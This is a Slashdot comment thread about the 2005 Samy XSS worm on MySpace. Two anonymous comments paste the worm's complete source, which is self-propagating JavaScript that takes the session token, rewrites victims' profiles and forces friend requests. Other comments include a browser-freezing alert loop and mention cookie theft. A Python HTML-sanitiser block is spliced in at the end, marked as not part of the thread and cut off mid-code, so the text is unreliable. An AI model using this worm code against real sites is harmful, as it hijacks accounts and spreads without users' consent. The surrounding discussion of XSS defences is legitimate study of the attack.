  • Re:Day late, dollar short. by the_wesman · · Score: 2, Funny

    cause myspace went down

    --
    calling all destroyers
  • Unpatched security holes? by phlegmofdiscontent · · Score: 2, Funny

    Wait, there are unpatched security holes in IE? From all I've heard lately, it's way more secure than Firefox. How could Microsoft let this happen????

    1. Re:Unpatched security holes? by Anonymous Coward · · Score: 0

      Hello? This is not news.
      Microsoft stopped patching critical security holes back in April 2003.
      Today we're at minimum 47 unpatched security holes in IE, ranging from code execution over spoofing and XSS to DoS.

    2. Re:Unpatched security holes? by Blakey+Rat · · Score: 1

      IE (and Safari, BTW, made by Apple and the KDE project) allow the web designer to put javascripts inside of CSS tags. Is that a security flaw or not? Could argue either way, I suppose.

      Don't blame Microsoft on this one, from reading the technical explanation, it sounds to me like MySpace doesn't have very strong security... their security seemed to be based entirely on searching for specific keywords (like "javascript") in input and blanking them out.

  • Re:Day late, dollar short. by gothfox · · Score: 2, Insightful

    Not just that. I don't know about others, but I read slashdot primarily for discussions, not raw news. There are a lot of places to flood you with news, but much less where you can actually read coherent discussions on the subject. Yes, slashdot's moderation system is far from ideal, but there actually _are_ insightful and interesting comments to read, not just "OMG LOL" babble.

  • Aww...so close... by Anonymous Coward · · Score: 0

    Thankfully, the script was written for fun and didn't try to take advantage of unpatched security holes in IE to create a massive MySpace botnet.

    "Thankfully"? Isn't that what we want? I mean...not so much the botnet, but more the whole MySpace-being-nuked thing. :-)

  • Emokids cry out! by Kylere · · Score: 1

    In a collective mass, millions of overly pale, and under-educated emo kids could be heard to scream as their only hope of getting laid timed out.

    Myspace, The AOL for 2005!

  • Re:Well, people have been saying it's a security r by Anonymous Coward · · Score: 0

    I browse with javascript disabled and have for 5 years, it immunises me against the majority of browser exploits. You can't stop morons running embedded script but webmasters can at least make sure their site works for that 5% of us with a clue. For more complex webapps, they can provide the security conscious with an alternate signed tarball or browser extension (that doesn't load/eval() script from remote servers).

  • maybe... by Anonymous Coward · · Score: 0

    after perusing his site, i happened to notice this in the comments on one of the pages...

    0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.repl ace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.repla ce('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ ,BH,true);if(BJ=='POST'){J.setRequestHeader('Conte nt-Type','application/x-www-form-urlencoded');J.se tRequestHeader('Content-Length',BK.length)}J.send( BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=fals e}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE= AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. 
'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes', '');AG=AG.substring(61,AG.length);if(AG.indexOf('s amy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']= 'Preview';AS['interest']=AG;J=getXMLObj();httpSend ('/index.cfm?fuseaction=profile.previewInterests&M ytoken='+AR,postHero,'POST',paramsToString(AS))}}} function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']= 'Submit';AS['interest']=AG;AS['hash']=getHiddenPar ameter(AU,'hash');httpSend('/index.cfm?fuseaction= profile.processInterests&Mytoken='+AR,nothing,'POS T',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendI D='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,get Home,'GET');xmlhttp2=getXMLObj();httpSend2('/index .cfm?fuseaction=invite.addfriend_verify&friendID=1 1851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}v ar AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658 ';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.a ddFriendsProcess&Mytoken='+AR,nothing,'POST',param sToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xm lhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.se tRequestHeader('Content-Type','application/x-www-f orm-urlencoded');xmlhttp2.setRequestHeader('Conten t-Length',BK.length)}xmlhttp2.send(BK);return true}">

    wonder what it is ;)

    1. Re:maybe... by Anonymous Coward · · Score: 0

      erherm, i mean this
      div id=my,code style="BACKGROUND: url('java
      script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}cat ch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromU RL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.repl ace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.repla ce('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ ,BH,true);if(BJ=='POST'){J.setRequestHeader('Conte nt-Type','application/x-www-form-urlencoded');J.se tRequestHeader('Content-Length',BK.length)}J.send( BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=fals e}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE= AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. 
'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes', '');AG=AG.substring(61,AG.length);if(AG.indexOf('s amy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']= 'Preview';AS['interest']=AG;J=getXMLObj();httpSend ('/index.cfm?fuseaction=profile.previewInterests&M ytoken='+AR,postHero,'POST',paramsToString(AS))}}} function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']= 'Submit';AS['interest']=AG;AS['hash']=getHiddenPar ameter(AU,'hash');httpSend('/index.cfm?fuseaction= profile.processInterests&Mytoken='+AR,nothing,'POS T',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendI D='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,get Home,'GET');xmlhttp2=getXMLObj();httpSend2('/index .cfm?fuseaction=invite.addfriend_verify&friendID=1 1851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}v ar AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658 ';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.a ddFriendsProcess&Mytoken='+AR,nothing,'POST',param sToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xm lhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.se tRequestHeader('Content-Type','application/x-www-f orm-urlencoded');xmlhttp2.setRequestHeader('Conten t-Length',BK.length)}xmlhttp2.send(BK);return true}">div

  • Re:Day late, dollar short. by Iriel · · Score: 1

    This is partially based on my programming prefs, but I listen to TWiT, CradCast, Pro PHP, and WebDevRadio (and I'm still looking for more good ones with more frequent updates). Though I've been meaning to check out http://www.techpodcasts.com/

    --
    Perfecting Discordia
    www.stevenvansickle.com
  • test by Anonymous Coward · · Score: 0

    This is a test of the JS exploit.

  • STD by Washizu · · Score: 1

    Who didn't know that place was full of STDs? (Script Transmitted Diseases)

    --
    OddManIn: A Game of guns and game theory.
  • Not Funny! by boy_of_the_hash · · Score: 1

    Sorry, Firefox doesn't execute script from within CSS files.

    1. Re:Not Funny! by Anonymous Coward · · Score: 0

      "Sorry, Firefox doesn't execute script from within CSS files."

      Calm down, fanboy; nobody said it did. That's not even how the code worked to begin with. The code worked by using JavaScript in style tags.

  • Re:Day late, dollar short. by (H)elix1 · · Score: 1

    If /. sucks so much, why are you still here?

    For the chicks, duh...

  • From the horse's mouth by FluffyPanda · · Score: 1

    You can read the (entertaining) description of the hack in his own words here:

    Samy is my hero

    1. Re:From the horse's mouth by jehiah · · Score: 1

      MOD PARENT UP it's much nicer to read a first hand report - this one from the horse's mouth.

  • Quick and Dirty solution by ajs318 · · Score: 2, Interesting

    My proposed "quick and dirty" solution is this.

    <script type="text/javascript">
        for (i = 0; i < 1000; ++i) {
            alert("Disable JavaScript for this site!");
        };
        alert("OK ..... Don't say you weren't warned.");
    </script>

    Now you can be sure that  {almost*}  nobody visiting your site has JavaScript enabled, so there is no chance of this affecting them.

    * There probably is _somebody_ _somewhere_ who really is masochistic enough to click the thing 1001 times.  Their computer probably is infected with several viruses already, though.

    --
    Je fume. Tu fumes. Nous fûmes!
    1. Re:Quick and Dirty solution by maxwell+demon · · Score: 1

      Well, just remove the "++i", and you can also remove the "almost" part of your description.
      If you find a corresponding browser vulnerability, you just might switch off JavaScript with your JavaScript code, of course :-)

      --
      The Tao of math: The numbers you can count are not the real numbers.
    2. Re:Quick and Dirty solution by arkanes · · Score: 5, Interesting
      This actually brings to mind something which has bugged me for a long time. Why the hell are JS dialogs modal?

      while (1) {alert("nope!");} Will DOS any browser in use today. You'll have to kill it via some OS level functionality, because alerts are modal and prevent interaction with the browser chrome. I understand that the JS spec is based on "run to completion", but is there any reason why JS alerts (and confirms, etc) shouldn't be modal to the document canvas (disabling interaction with the canvas, but not browser chrome) rather than the browser itself?

    3. Re:Quick and Dirty solution by Anonymous Coward · · Score: 0

      Or you could just hold the enter key...

    4. Re:Quick and Dirty solution by WWWWolf · · Score: 1
      Now you can be sure that {almost*} nobody visiting your site has JavaScript enabled, so there is no chance of this affecting them.

      Or, as thousands of sites who still block by user-agent seemingly don't know, nobody is visiting the site.

      People are lazy. What do you think is more likely - that they turn off Javascript which seems to have worked just fine so far and not broken anything, or decide to never, ever click on that link that leads to your site?

    5. Re:Quick and Dirty solution by Anonymous Coward · · Score: 1, Interesting

      They are not modal on Opera, although they will prevent any interaction with the tab that generated the alert, everything else works just fine - I can also use the tab bar or the window sidebar to close it or simply disable javascript at any time with the menu or F12.

    6. Re:Quick and Dirty solution by barryman_5000 · · Score: 1

      I believe it's because of the old Apple II syndrome. It worked so well to have only one focused window back then and people were more patient too.

    7. Re:Quick and Dirty solution by Anonymous Coward · · Score: 0

      Firefox Bugzilla has a bug request (copy and paste URL): https://bugzilla.mozilla.org/show_bug.cgi?id=61098

      Unfortunately, no one thinks it's worth the time to implement.

    8. Re:Quick and Dirty solution by someonewhois · · Score: 1

      Slight work around -- hold enter while clicking madly on the X (either window X or tab X, or middle clicking the tab). This'll, at least on Firefox, let you click the X before it spawns the next one (since alert boxes are also blocking in JS itself).

    9. Re:Quick and Dirty solution by Sloppy · · Score: 1
      Unfortunately(?), disabling Javascript on myspace, pretty much disables myspace. Myspace's designers use Javascript for everything, even as a substitute for hyperlinks in some cases! There's no legitimate reason to do that, which makes me sometimes wonder if the intent is to make the site less usable. It pisses me off when I can't open something in a new tab, due to it being a "javascript link" instead of a normal hyperlink.

      Myspace is crap. And I visit it almost every day. *sigh*

      --
      As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
    10. Re:Quick and Dirty solution by m50d · · Score: 2, Insightful
      while (1) {alert("nope!");} Will DOS any browser in use today. You'll have to kill it via some OS level functionality,

      Not Links: any javascript dialog has an extra button "kill script". I wish the supposedly more featureful alternatives would adopt this simple improvement.

      --
      I am trolling
    11. Re:Quick and Dirty solution by matts-reign · · Score: 1

      I remember using MyIE2 at some point (maxthon now isn't it?).

      What I liked was that if a javascript popup came up, in the status bar it read

      "Hold Ctrl to suppress any more alerts" or something to that effect.

      So if you would click on Ok while holding Ctrl the script was suppressed.

      --
      Waffles rock.
  • No irony was intended by benhocking · · Score: 4, Funny

    No, actually my pinky finger slipped and hit the "l" instead of the ";". I won't even try to explain how such a slip is possible as my other finger should have been in the way. I think I'm gonna blame quantum tunneling.

    --
    Ben Hocking
    Need a professional organizer?
    1. Re:No irony was intended by JasonKChapman · · Score: 5, Funny
      I think I'm gonna blame quantum tunneling.

      Blame Heisenberg. At any given time every key is either pressed or not until you hit "submit" and find out for sure.

      --
      Sorry, I'm a writer. That makes you raw material.
    2. Re:No irony was intended by Steele · · Score: 2, Insightful

      This is a great comment, however I quietly lament that the number of people that will understand this is rapidally diminishing..

    3. Re:No irony was intended by CreatureComfort · · Score: 5, Funny


      Heisenberg? Wouldn't that be Schrodinger?

      Heisenberg just says that you can never really be sure where the keys actually are, or your fingers for that matter.

      --
      "Unheard of means only it's undreamed of yet,
      Impossible means not yet done." ~~ Julia Ecklar
    4. Re:No irony was intended by gitchel · · Score: 1

      IIRC, wouldn't Schrodinger assume that no keys were pushed at all until what you wrote was read? In other words, I think the typo can certainly be blamed on the reader in this case. He's the one who killed the cat by opening the box.

    5. Re:No irony was intended by SatanicPuppy · · Score: 1

      I think Heisenberg would have said that you can know where the key is, or you can press it, you just can't do both.

      --
      ad logicam Claiming a proposition is false because it was presented as the conclusion of a fallacious argument.
    6. Re:No irony was intended by syntaxglitch · · Score: 1

      Wouldn't that be more like being able to know where a key is or whether you've pressed it, but not both? :)

    7. Re:No irony was intended by Senzei · · Score: 1

      You actually shouldn't be too upset, so long as you do not ask anyone if they get the comment you are as safe in assuming that they do understand it as you are that they do not.

      --
      Slashdot: Where anecdotes and generalizations can be freely substituted for facts, logic, or intelligence
    8. Re:No irony was intended by blincoln · · Score: 4, Funny

      I've been trying to slowly re-educate the local population.

      I have Schroedinger's wavefunction equation tattooed on my arm, and every time someone asks about it, I explain about the cat and the two-slit experiment. It would probably be more effective if I printed out pamphlets, because there isn't enough time to even explain the cat properly if a grocery-store clerk asks.

      --
      "...always new atoms but always doing the same dance, remembering what the dance was yesterday." -Richard Feynman
    9. Re:No irony was intended by Mechcozmo · · Score: 1
      pqnw[ei[fjhsaidfhj;nqwjerofhsadkfk;naljq1234358t3[ -u2=saerjif\]njnmxnvm,zqa';sdfk,,...lkojadsfAD

      I pressed every key on the keyboard at any given time given the limits of time, space, and the 3rd dimension. Am I not understanding something?

    10. Re:No irony was intended by Anonymous Coward · · Score: 0

      Yes, it's a shame that not every Slashdot member is also a member of your particular subset of geekdom. Condescending Fuckwit.

    11. Re:No irony was intended by Red+Flayer · · Score: 1

      Actually Heisenberg would say that you can only know one of the following:

      (1) which of your fingers are depressing keys (their momentum); or

      (2) at which keys your fingers may or may not be depressing (their location).

      Freud would add that any keys that are depressed have sexual issues with a parent.

      --
      "Trolls they were, but filled with the evil will of their master: a fell race..." -- J.R.R. Tolkien on Olog-hai
    12. Re:No irony was intended by Red+Flayer · · Score: 1

      Schrodinger would assume that all possible combinations and permutations of the keys had been pushed, until observation reveals what happened.

      --
      "Trolls they were, but filled with the evil will of their master: a fell race..." -- J.R.R. Tolkien on Olog-hai
    13. Re:No irony was intended by Anonymous Coward · · Score: 0

      It's also a shame that any Slashdot member would consider a layman's knowledge of important scientific revolutions in the past century to be only a 'subset of geekdom'.

      I don't think it's unreasonable to think that the general population should be at least somewhat educated. He wasn't asking you to have a physics degree.

    14. Re:No irony was intended by GodfatherofSoul · · Score: 1

      Well, now that I have broadband access to the internet, I always know where my hands are when I'm online.

      --
      I swear to God...I swear to God! That is NOT how you treat your human!
    15. Re:No irony was intended by Anonymous Coward · · Score: 0

      Heisenberg was the one I think he was talking about. Heisenberg Uncertainty Principle, the great friend of quantum physics.

    16. Re:No irony was intended by Anonymous Coward · · Score: 0

      ... as are the number of people that can spell "rapidly".

    17. Re:No irony was intended by xTantrum · · Score: 1

      yeah you can do both. or maybe both is already being done. it only comes into existence when you look at it and notice it and or choose.

      --
      $action = empty(PHP) ? backToC() : unset(PHP) ; "when the concrete cases are understood, the abstractions are readily
    18. Re:No irony was intended by Irish_Samurai · · Score: 1

      I'm probably way off, but I thought according to Schrodinger that the key would be both down and up.

    19. Re:No irony was intended by tolkienfan · · Score: 1
      I thought this comment through, and decided not to post it:

      "No, you can know the position of your fingers, or the momentum, but not both".

      Wow, I'm glad I didn't post that.

    20. Re:No irony was intended by NtroP · · Score: 1
      I have Schroedinger's wavefunction equation tattooed on my arm
      You sir, are a true geek among men. I salute you.
      --
      "terrorism" and "pedophilia" are the root passwords to the Constitution
    21. Re:No irony was intended by CreatureComfort · · Score: 1


      And yet, still no Shakespeare...

      --
      "Unheard of means only it's undreamed of yet,
      Impossible means not yet done." ~~ Julia Ecklar
    22. Re:No irony was intended by EternityInterface · · Score: 0

      No-one seems to like Nietzche here, and then philosophy applies to everything. So they're really missing out on things. What I do notice is the only targets of quoting is those constitution guys. Fuck you guys. This is after reading ~10k posts, so, fuck you guys.

      --
      the sun is god
    23. Re:No irony was intended by Hal_Porter · · Score: 1

      That's Nietzsche. Democracy and Christianity have turned you into a feeble minded untermensch.

      --
      echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
    24. Re:No irony was intended by EternityInterface · · Score: 0

      the irrationality of a thing
      is no argument against its existence
      rather a condition of it
      {"on cats"}

      --
      the sun is god
  • With myspace popularity, comes the problems by British · · Score: 2, Insightful

    1. Embedded music videos. Anyone have a host list of the music video providers? I'd like to resolve them to 127.0.0.1
    2. Bogus accounts. There is a huge rash of "stripper" accounts, consisting of minimal user info, that messages out to single guys to get them to email them at their yahoo accounts. They typically have 4 or 5 risque pictures, making everyone think all women are whores. Bad bad bad.
    3. Myspace needs a "safe mode" where the excessively bad(bells and whistles) profiles that sodomize any web browser can be avoided.
    4. Why does clicking to one of your groups have to open in a new window? WHY? The top-bar navigation makes that unnecessary.

    But still, myspace is better than orkut. People actually use myspace.

    1. Re:With myspace popularity, comes the problems by ptomblin · · Score: 2, Interesting
      5. Image leeches. Whenever I see a lot of hits on one of my pictures on my web site, it's because some asshole at MySpace has embedded it in his page without asking permission, without copying it, and without giving it any attribution.

      Which is why I now have
      RewriteEngine On
      # any referrer on myspace.com or one of its subdomains, case-insensitive
      RewriteCond %{HTTP_REFERER} ^http://([^/]+\.)?myspace\.com/ [NC]
      # hand those requests the placeholder instead of the .jpg (external redirect, last rule)
      RewriteRule .*\.jpg http://xcski.com/~ptomblin/leech.png [R,L]
      in my Apache configuration.
      --
      The next Cmdr Taco duplicate will be ready soon, but subscribers can beat the rush and see it early!
    2. Re:With myspace popularity, comes the problems by British · · Score: 1

      I had a problem with some teenybopper on livejournal, using a Blondie image from my web page as her LJ background.

      I asked her politely, and even suggested she set up some web space and just copy the image off my site so she could use it (without bandwidth concerns). In true passive-aggressive fashion, she ignored me.

      So I changed the image filename to tubgirl.

      By some amazing coincidence, she changed the image to something else a day later.

    3. Re:With myspace popularity, comes the problems by ptomblin · · Score: 1

      The first time I noticed it happening, I wrote to the guy, and got back an extremely incoherent response. I think he was denying that he was doing anything wrong, but I couldn't be sure. So I did the redirect to my leech.png, and then I went back to his page a few days later and he's complaining that I hacked his web site, and he was changing all his passwords. But he was leeching somebody else's picture as his background.

      I guess it's too much to expect a modern teenager to actually learn something from his experiences.

      --
      The next Cmdr Taco duplicate will be ready soon, but subscribers can beat the rush and see it early!
    4. Re:With myspace popularity, comes the problems by Anonymous Coward · · Score: 0

      sounds like someone is a bit pissy he did not get an orkut invite.

      Wahh. with that attitude you will never get one.

    5. Re:With myspace popularity, comes the problems by blake213 · · Score: 2, Informative

      Use these greasemonkey scripts to get rid of all that crap.

      --
      mund freud.
  • Molester's by Wedge1212 · · Score: 0, Flamebait

    My Space: For child molesters and the children they molest! ...ala is anyone surprised?

    --
    See Sig! See Sig Zig! Zig Sig Zig!!!!!
  • You're kidding... by Anonymous Coward · · Score: 0

    right? They're not just going to hire someone who figured out how to bypass a filter. That's not brilliant design by any means.

  • For further reading by Hosiah · · Score: 1

    Since I know only about 12 programming languages and use maybe 10 libraries between them all, that makes me next to computer illiterate these days. So I didn't know what XSS was, but found this site: http://www.cgisecurity.com/articles/xss-faq.shtml extremely informative. Including some HEX code that looks like fun!

  • This is *not* XSS by brunes69 · · Score: 0

    This is, by definition, not a cross site scripting vulnerability, since all the requests were confined to the MySpace.com domain.

    In fact, I don't see how anyone who even read the article could conclude that it was XSS. There isn't even a vulnerability in the browser being exploited here, it is just vulnerabilities in the MySpace.com software.

    XSS vulnerabilities are much worse than this. If this guy had tried to use XMLHttpRequest to access a site off of MySpace.com, he would find that all it would result in is raising a security exception. XSS vulnerabilities use holes in browsers to get around this, allowing data to flow from one website to another without the user's knowledge. That is dangerous.

    1. Re:This is *not* XSS by Anonymous Coward · · Score: 2, Informative

      And now for the nit-picking minute...

      If you read the technical explanation of the worm, you will see (item 8) that he had to add an extra redirection to go from profile.myspace.com to www.myspace.com.

      The cross-site part is not the main part of the worm. But still...

    2. Re:This is *not* XSS by Anonymous Coward · · Score: 0

      Cross-site scripting attacks *do not* need to be between different sites or domains. They are poorly named, as one of the original researchers, Marc Slemko points out here: http://httpd.apache.org/info/css-security/

      But cross-site scripting, as generally defined, definitely encompasses this kind of bug.

  • Re:Day late, dollar short. by nine-times · · Score: 2, Insightful
    agreed. The fact is, Slashdot is not a news source. They don't write their own articles or do their own investigations. It's a news aggregator paired with discussion forums.

    By the very nature of being a news aggregator, it will never be the first place that a story appears. It will always be elsewhere on the net first, and someone will then notice it and submit it here. So ok, maybe you saw it somewhere else first. Maybe you got it from the original source. Good for you. Those who failed to happen upon the story elsewhere can still learn about it here, and even if you saw it someplace else first, you can still join in the discussion.

  • Disable JavaScript And Leave It Off by Anonymous Coward · · Score: 0
    This bug would not occur were client-side JavaScript (or any other language) execution disabled.

    Will developers ever understand that downloadable code can NEVER be secure?

    Years ago developers who used mainframes with greenscreens (which have the capability of executable client-side code in some cases) concluded that security was impossible two decades ago; furthermore academicians have proven that secure downloadable code is impossible.

    Today we have idiots re-creating the problem in a browser (a much more volatile and less secure environment) with JavaScript, AJAX and XMLHTTPRequest.

  • the turd of myspace by 5n3ak3rp1mp · · Score: 1, Informative

    awhile back all my younger friends started bugging me to get a myspace profile. I took one look at the site, first thought was "crap design" (I'm a web/db dev), second thought was "superficial", closed window. I was just appalled at how bad it looked (despite still visiting Slashdot every day... hehe)

    All I can surmise is that the person who designed this worm is far more clever than any of the people who designed MySpace.

    I still don't have a profile on it...

  • Re:Day late, dollar short. by Iriel · · Score: 1

    I thank you and the others that agree with me on this. That and I get tired of the false cries of dupe (some are legit) when the story is really a follow-up or an update.

    --
    Perfecting Discordia
    www.stevenvansickle.com
  • Put them out of work, or give them better skills by benhocking · · Score: 1

    Actually, I think that if IE became more strict it would require them to learn a little more about how HTML is designed to work. It should make them more employable, not less. Of course, this is similar to Nietzsche's "That which does not kill me, makes me stronger" and its corollary, "Yeah, but that which does kill me..."

    --
    Ben Hocking
    Need a professional organizer?
  • D'oh! by benhocking · · Score: 1

    Well, yeah. Um, about that. You see, well, it oughta. It just oughta.

    But seriously, I think there are other examples where IE does allow incorrect HTML, but now my credibility is just shot. :P

    --
    Ben Hocking
    Need a professional organizer?
  • Re:Day late, dollar short. by Mister+Transistor · · Score: 1

    Heh... I think you have cause and effect reversed!

    --
    -- You are in a maze of little, twisty passages, all different... --
  • MySpace has always been insecure by zootread · · Score: 1

    I found a similar exploit (force people to add you) back when they were allowing Javascript in your profile. MySpace has always been really insecure, mainly because of their stupid design decision to allow users to use more than basic HTML. They allowed Javascript at first, thinking they'd be able to filter out anything malicious. They soon realized that was stupid and filtered out Javascript. Turns out there was a way to slip it in through CSS (granted only for IE). I'm not surprised.

    Also, when they originally disabled Javascript, they didn't go through everyone's profile and re-filter it. So there are still people using Javascript hacks that just haven't updated their profile, so the hack remains in place. For example, there is a way to read someone's cookie and send it somewhere, thus making it possible to see who visits your profile (and maybe something more malicious).

    --
    Zoot!
  • Javascript in comments by jurt1235 · · Score: 1

    That would be a good addition; maybe we could then run our own banners to promote our own favourable comments. Flamebaits/bad ratings would hurt earnings, and since (almost) everybody likes earnings, it would improve the quality of the comments to an unprecedented level.

    My guess about the moderation on this comment in a javascript & graphics allowed comment environment: -1 (Redundant)

    --

    My wife's sketchblog Blob[p]: Gastrono-me
  • Doesn't work. by Anonymous Coward · · Score: 0

    This doesn't work on slashdot.
    Someone figured out how to execute javascript in a div-tag in /.-posts (pop-up & goatse redirect on mouseover) about 2 (?) years ago, but it was fixed veeeerry fast.

  • Not the first worm of that type by TheLink · · Score: 2, Interesting

    Firstly it's on the same site :).

    Advogato (mod_virgule) was vulnerable to this sort of thing before (back in 2002). Won't be surprised if there were others too.

    Anyway, I proposed years ago that there be HTML tags to turn off any active/dynamic stuff.

    Currently the HTML situation is like only being able to turn off the lights by going to dozens of switches one by one and turning them off. There is no main power switch to turn ALL the lights off, or even groups of lights off.

    I guess it's just me who thinks that the HTML equivalent of a "Big Red OFF" switch would be useful.

    e.g.
    <shieldson lock="randomstring" allowed="keyword,keyword,keyword" />
    disallowed material disabled
    <shieldsoff lock="randomstring"/>
    state restored to before lock

    Where keywords:
    textonly = just text
    basic = basic formatting <em> <b> <i> <strong>
    tables = tables
    urls = plain <a href=""> no javascript etc.
    images = plain images, no javascript etc.
    java = java
    javascript = javascript

    The idea is it will be very hard for the attacker to guess the random string.

    Oh well...

    --
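    TheLink's "Big Red OFF" proposal, carried through as an added example that is not part of this thread and not a real HTML feature: a filter that reduces everything between a shieldson tag and the shieldsoff tag carrying the same lock to the listed keywords, and ignores any shieldsoff whose lock does not match, which is the property that makes the random string worth anything. The keyword meanings, the attribute allowlist and the sample markup are assumptions.

```python
"""Toy enforcement of the <shieldson>/<shieldsoff> sketch above.

Added example, not from the thread and not a real HTML feature: keyword
meanings and the attribute allowlist are assumptions drawn from the comment.
"""
import html
import re
from html.parser import HTMLParser

# What each proposed keyword is assumed to permit inside a shielded region.
# "textonly" permits nothing; "java" and "javascript" are deliberately absent,
# so content inside a region can never ask for them.
KEYWORD_TAGS = {
    "textonly": set(),
    "basic": {"em", "b", "i", "strong"},
    "tables": {"table", "tr", "td", "th"},
    "urls": {"a"},
    "images": {"img"},
}
URL_ATTRS = {"a": "href", "img": "src"}   # the only attributes kept inside a region


def safe_url(value):
    """Keep only http(s) URLs, after collapsing whitespace and control
    characters so a split token such as "java\\nscript:" is not misread."""
    collapsed = re.sub(r"[\x00-\x20\x7f]", "", value or "")
    return collapsed if re.match(r"https?://", collapsed, re.I) else None


class ShieldFilter(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.lock = None       # lock string of the open region; None when unshielded
        self.allowed = set()   # tags permitted in the current region
        self.dropped = []      # tags removed in the region, so their end tags go too
        self.suppress = None   # script/style whose body must not leak out as text

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "shieldson":
            if self.lock is None:          # a nested shieldson never replaces the lock
                self.lock = attrs.get("lock") or ""
                self.allowed = set()
                for kw in (attrs.get("allowed") or "").split(","):
                    self.allowed |= KEYWORD_TAGS.get(kw.strip().lower(), set())
            return
        if tag == "shieldsoff":
            # Only the holder of the random lock string restores the old state;
            # a guessed or missing lock leaves the region shielded.
            if self.lock is not None and attrs.get("lock") == self.lock:
                self.lock = None
            return
        if self.lock is None:              # outside a region: pass through untouched
            self.out.append(self.get_starttag_text())
            return
        if tag not in self.allowed:
            self.dropped.append(tag)
            if tag in ("script", "style"):
                self.suppress = tag
            return
        kept = ""
        url_attr = URL_ATTRS.get(tag)
        if url_attr:
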